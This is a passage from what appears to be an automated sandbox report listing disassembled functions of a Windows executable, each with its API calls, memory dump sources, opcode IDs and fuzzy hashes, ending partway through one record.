                                          • Instruction Fuzzy Hash: BDE05571A8030CBBD611AB26CC029AEBB54DB85721B0102A8F800A3240CE34AE00FAD6
                                          Function 00FABBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00FAB7BB: GetOEMCP.KERNEL32(00000000,?,?,00FABA44,?), ref: 00FAB7E6
                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00FABA89,?,00000000), ref: 00FABC64
                                          • GetCPInfo.KERNEL32(00000000,00FABA89,?,?,?,00FABA89,?,00000000), ref: 00FABC77
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: CodeInfoPageValid
                                          • String ID:
                                          • API String ID: 546120528-0
                                          • Opcode ID: cb510c4bb586d7af51080ec3af179868041fbb6675c81f7d1337684e999c1c28
                                          • Instruction ID: bb91ef61ed61d83a549adce9997e9bd00005285d031dcf31de38c974aadc61e5
                                          • Opcode Fuzzy Hash: cb510c4bb586d7af51080ec3af179868041fbb6675c81f7d1337684e999c1c28
                                          • Instruction Fuzzy Hash: 3C5134B1E002459EDB20DF75C881ABABBF4EF43320F18416ED4968B253D7399946FB90
                                          Function 00F89A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetFilePointer.KERNEL32(000000FF,?,?,?,-00000870,00000000,00000800,?,00F89A50,?,?,00000000,?,?,00F88CBC,?), ref: 00F89BAB
                                          • GetLastError.KERNEL32(?,00000000,00F88411,-00009570,00000000,000007F3), ref: 00F89BB6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastPointer
                                          • String ID:
                                          • API String ID: 2976181284-0
                                          • Opcode ID: 7d0d7830fd2c491989c78f98c5df331bd7975582c3ad0b71dd8eb45e8041221f
                                          • Instruction ID: 6bcc5ad1bd9952a9840c54ddf53acd6b66120e1d36891b68b62d2a0e583aaacd
                                          • Opcode Fuzzy Hash: 7d0d7830fd2c491989c78f98c5df331bd7975582c3ad0b71dd8eb45e8041221f
                                          • Instruction Fuzzy Hash: 7B41BE319083458FDB24EF15E9845BAB7E5FFD4320F188A2DE89183261E7F4EE44AB51
                                          Function 00FABA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00FA97E5: GetLastError.KERNEL32(?,00FC1030,00FA4674,00FC1030,?,?,00FA3F73,00000050,?,00FC1030,00000200), ref: 00FA97E9
                                            • Part of subcall function 00FA97E5: _free.LIBCMT ref: 00FA981C
                                            • Part of subcall function 00FA97E5: SetLastError.KERNEL32(00000000,?,00FC1030,00000200), ref: 00FA985D
                                            • Part of subcall function 00FA97E5: _abort.LIBCMT ref: 00FA9863
                                            • Part of subcall function 00FABB4E: _abort.LIBCMT ref: 00FABB80
                                            • Part of subcall function 00FABB4E: _free.LIBCMT ref: 00FABBB4
                                            • Part of subcall function 00FAB7BB: GetOEMCP.KERNEL32(00000000,?,?,00FABA44,?), ref: 00FAB7E6
                                          • _free.LIBCMT ref: 00FABA9F
                                          • _free.LIBCMT ref: 00FABAD5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: _free$ErrorLast_abort
                                          • String ID:
                                          • API String ID: 2991157371-0
                                          • Opcode ID: 116dccc6474f2023c9e8004bd5de55c288e054a3cc6c41044e2d6ce2c3b6214e
                                          • Instruction ID: c3edbea89331ea548a73ab8780bfd57e5afe8525c719804537c84ae7eea25fa2
                                          • Opcode Fuzzy Hash: 116dccc6474f2023c9e8004bd5de55c288e054a3cc6c41044e2d6ce2c3b6214e
                                          • Instruction Fuzzy Hash: 3531B6B1D04209AFDB10DFA8D841B9D77F5EF42320F254199E8049B2A3EB7A9D41FB50
                                          Function 00F81E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00F81E55
                                            • Part of subcall function 00F83BBA: __EH_prolog.LIBCMT ref: 00F83BBF
                                          • _wcslen.LIBCMT ref: 00F81EFD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: H_prolog$_wcslen
                                          • String ID:
                                          • API String ID: 2838827086-0
                                          • Opcode ID: 8981a233db75051f69351399f6605444b29e63dcf8aa44bce6fddf56a83b4303
                                          • Instruction ID: ad9094bd6575fd11edf41d11f5a1cf20a4428e7e80d3b8af9109d27b4ddd3b25
                                          • Opcode Fuzzy Hash: 8981a233db75051f69351399f6605444b29e63dcf8aa44bce6fddf56a83b4303
                                          • Instruction Fuzzy Hash: 7C314971D04209AFDF15EF98C945AEEBBFABF48310F1001AAF845A7251CB365E15EB60
                                          Function 00F89DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00F873BC,?,?,?,00000000), ref: 00F89DBC
                                          • SetFileTime.KERNEL32(?,?,?,?), ref: 00F89E70
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: File$BuffersFlushTime
                                          • String ID:
                                          • API String ID: 1392018926-0
                                          • Opcode ID: babbd7c59f5e41750c40276bd5a806f823473fc287324fa5e896a9c6786dce70
                                          • Instruction ID: d0d11aed7318e3f08eb18c6ad259d937bb2bc46acf98ddfb7cb7ca8a69af1059
                                          • Opcode Fuzzy Hash: babbd7c59f5e41750c40276bd5a806f823473fc287324fa5e896a9c6786dce70
                                          • Instruction Fuzzy Hash: 2A21F03264C246EBCB14EF34C891ABBBBE8AF91314F08491CF4C583141D369E90DAB61
                                          Function 00F8966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00F89F27,?,?,00F8771A), ref: 00F896E6
                                          • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00F89F27,?,?,00F8771A), ref: 00F89716
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: f372be0720387c77ab0808eb1de249ff5d93f68ae0b85f42d31273df0b0987cf
                                          • Instruction ID: 09290983ff25985bb9170e7f20e09d62683a4505cdbf6605a8e2eed2d69b5903
                                          • Opcode Fuzzy Hash: f372be0720387c77ab0808eb1de249ff5d93f68ae0b85f42d31273df0b0987cf
                                          • Instruction Fuzzy Hash: 1A21E0714483446EE330AA65CC89BF777DCEB49324F040A18F995C21C1D7B8A884AB31
                                          Function 00F89E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000001), ref: 00F89EC7
                                          • GetLastError.KERNEL32 ref: 00F89ED4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastPointer
                                          • String ID:
                                          • API String ID: 2976181284-0
                                          • Opcode ID: 9af783cabb848c5a7849bdfcafadfe9d8da93f32f3a12b657ffd5f47f0893034
                                          • Instruction ID: 80f5a46bc32d8b360eb6742584ef609c87ff35e26c93ce880955b078ade21ffb
                                          • Opcode Fuzzy Hash: 9af783cabb848c5a7849bdfcafadfe9d8da93f32f3a12b657ffd5f47f0893034
                                          • Instruction Fuzzy Hash: CE112531A44304ABD734E628CC85BF6BBE9AB05370F540A29E552D26D0D3F0ED45E770
                                          Function 00FA8E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00FA8E75
                                            • Part of subcall function 00FA8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00FACA2C,00000000,?,00FA6CBE,?,00000008,?,00FA91E0,?,?,?), ref: 00FA8E38
                                          • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00FC1098,00F817CE,?,?,00000007,?,?,?,00F813D6,?,00000000), ref: 00FA8EB1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Heap$AllocAllocate_free
                                          • String ID:
                                          • API String ID: 2447670028-0
                                          • Opcode ID: fe5e239bfe70a3d933f5045d3fa27ace86086841572e3a17de9ddec397f2f912
                                          • Instruction ID: e35081e91042f578e0ad6ad4648218b915e5e3ab701fe0d4d4c5b5ebbb31e52e
                                          • Opcode Fuzzy Hash: fe5e239bfe70a3d933f5045d3fa27ace86086841572e3a17de9ddec397f2f912
                                          • Instruction Fuzzy Hash: 21F0C8B2A01105E6CB212AA59C84F6F77588F937F0F140125F8149A191DFE49D03B5A0
                                          Function 00F9109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,?), ref: 00F910AB
                                          • GetProcessAffinityMask.KERNEL32(00000000), ref: 00F910B2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Process$AffinityCurrentMask
                                          • String ID:
                                          • API String ID: 1231390398-0
                                          • Opcode ID: 276d24fcae5c718d4ba23e5afdef0f244e8cdbac3e2eccf7474d27bde0dcf45a
                                          • Instruction ID: a002f660631845a813c370e347f1761f018fbaff394f1b34d87895744d41e77e
                                          • Opcode Fuzzy Hash: 276d24fcae5c718d4ba23e5afdef0f244e8cdbac3e2eccf7474d27bde0dcf45a
                                          • Instruction Fuzzy Hash: 7EE0D832F0014EA7EF1997B49C058EB73DDFE442583104175E403D3111F931DE416A60
                                          Function 00F8A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetFileAttributesW.KERNEL32(?,00000000,00000001,?,00F8A325,?,?,?,00F8A175,?,00000001,00000000,?,?), ref: 00F8A501
                                            • Part of subcall function 00F8BB03: _wcslen.LIBCMT ref: 00F8BB27
                                          • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00F8A325,?,?,?,00F8A175,?,00000001,00000000,?,?), ref: 00F8A532
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AttributesFile$_wcslen
                                          • String ID:
                                          • API String ID: 2673547680-0
                                          • Opcode ID: 59160a6347da9c8a03724dd6906db274831c7c6e3a3c0ba106e386bba6fcae45
                                          • Instruction ID: 25ed83d6ea3f01386a877b439077b58af5eab661c5216a1e0702dc2095ffab99
                                          • Opcode Fuzzy Hash: 59160a6347da9c8a03724dd6906db274831c7c6e3a3c0ba106e386bba6fcae45
                                          • Instruction Fuzzy Hash: 2FF03932290209BBEF016F60DC85FDA376CAF05389F488061B949DA164DB71DAD9FB50
                                          Function 00F8A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DeleteFileW.KERNEL32(000000FF,?,?,00F8977F,?,?,00F895CF,?,?,?,?,?,00FB2641,000000FF), ref: 00F8A1F1
                                            • Part of subcall function 00F8BB03: _wcslen.LIBCMT ref: 00F8BB27
                                          • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00F8977F,?,?,00F895CF,?,?,?,?,?,00FB2641), ref: 00F8A21F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: DeleteFile$_wcslen
                                          • String ID:
                                          • API String ID: 2643169976-0
                                          • Opcode ID: dbad3235b45119cf8e46c00a8e8ec82bd39db0c6167d47fb101d81c053861a36
                                          • Instruction ID: e6ae6f4d3f40b4cf10a40fbc7c872f10824a3200623d63a0aef93a9fa27a7b38
                                          • Opcode Fuzzy Hash: dbad3235b45119cf8e46c00a8e8ec82bd39db0c6167d47fb101d81c053861a36
                                          • Instruction Fuzzy Hash: 5FE092315842096BEB11BF60DC45FD9775CAF083C5F484061B944D2054EB61DE84FB50
                                          Function 00F9AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                          Download Yara Rule
                                          APIs
                                          • GdiplusShutdown.GDIPLUS(?,?,?,?,00FB2641,000000FF), ref: 00F9ACB0
                                          • CoUninitialize.COMBASE(?,?,?,?,00FB2641,000000FF), ref: 00F9ACB5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: GdiplusShutdownUninitialize
                                          • String ID:
                                          • API String ID: 3856339756-0
                                          • Opcode ID: b2ffff1d50e5a3fde617c57a0a1caf859899de4e48784b88ff4e759793e48ef0
                                          • Instruction ID: 6cebcb068c39a9787fca14e5640c687976548b6826dc1f90e894c45178794e9a
                                          • Opcode Fuzzy Hash: b2ffff1d50e5a3fde617c57a0a1caf859899de4e48784b88ff4e759793e48ef0
                                          • Instruction Fuzzy Hash: 62E06D72644654EFCB01DF59DC46B49FBA9FB89B60F00436AF416D37A0CB78B801DA90
                                          Function 00F8A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNEL32(?,?,?,00F8A23A,?,00F8755C,?,?,?,?), ref: 00F8A254
                                            • Part of subcall function 00F8BB03: _wcslen.LIBCMT ref: 00F8BB27
                                          • GetFileAttributesW.KERNEL32(?,?,?,00000800,?,00F8A23A,?,00F8755C,?,?,?,?), ref: 00F8A280
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AttributesFile$_wcslen
                                          • String ID:
                                          • API String ID: 2673547680-0
                                          • Opcode ID: ef59353475593bfa1e28fac1a2f39962e7d4d46002654b1d19fe7d3aeb9fe3f4
                                          • Instruction ID: 065e1e091bb83a296d1ef29ca64af015a7677b43be271dc4ef3a488d9c6e72c8
                                          • Opcode Fuzzy Hash: ef59353475593bfa1e28fac1a2f39962e7d4d46002654b1d19fe7d3aeb9fe3f4
                                          • Instruction Fuzzy Hash: D5E092319401289BDF20BB64CC45BD97758EB083E5F0442A1FD44E3190D771DE44EBA0
                                          Function 00F9DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                          Download Yara Rule
                                          APIs
                                          • _swprintf.LIBCMT ref: 00F9DEEC
                                            • Part of subcall function 00F84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F840A5
                                          • SetDlgItemTextW.USER32(00000065,?), ref: 00F9DF03
                                            • Part of subcall function 00F9B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F9B579
                                            • Part of subcall function 00F9B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F9B58A
                                            • Part of subcall function 00F9B568: IsDialogMessageW.USER32(0001040C,?), ref: 00F9B59E
                                            • Part of subcall function 00F9B568: TranslateMessage.USER32(?), ref: 00F9B5AC
                                            • Part of subcall function 00F9B568: DispatchMessageW.USER32(?), ref: 00F9B5B6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                          • String ID:
                                          • API String ID: 2718869927-0
                                          • Opcode ID: ccab1a419a012b3a8501749b6a252e14bfb4b0dc82de7510560beaa1dad964ea
                                          • Instruction ID: c44cd0427484d1050b397f92d806ad177acc23a2a56532af2f1d2a9fd4d89f1d
                                          • Opcode Fuzzy Hash: ccab1a419a012b3a8501749b6a252e14bfb4b0dc82de7510560beaa1dad964ea
                                          • Instruction Fuzzy Hash: 8DE092B280424C66EF02FB60DD0BFDF3B6C5B057C5F040851B640DB0A2EA7DEA11A761
                                          Function 00F9081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSystemDirectoryW.KERNEL32(?,00000800,00FC81C8,?,00F8F2D8,Crypt32.dll,00000000,00F8F35C,?,?,00F8F33E,?,?,?,?), ref: 00F90836
                                          • LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00F8F2D8,Crypt32.dll,00000000,00F8F35C,?,?,00F8F33E,?,?,?), ref: 00F90858
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: DirectoryLibraryLoadSystem
                                          • String ID:
                                          • API String ID: 1175261203-0
                                          • Opcode ID: 5523375e87895ea5ebeba2980c5d2e14e179aee81bb96fd63f195be97fd00c45
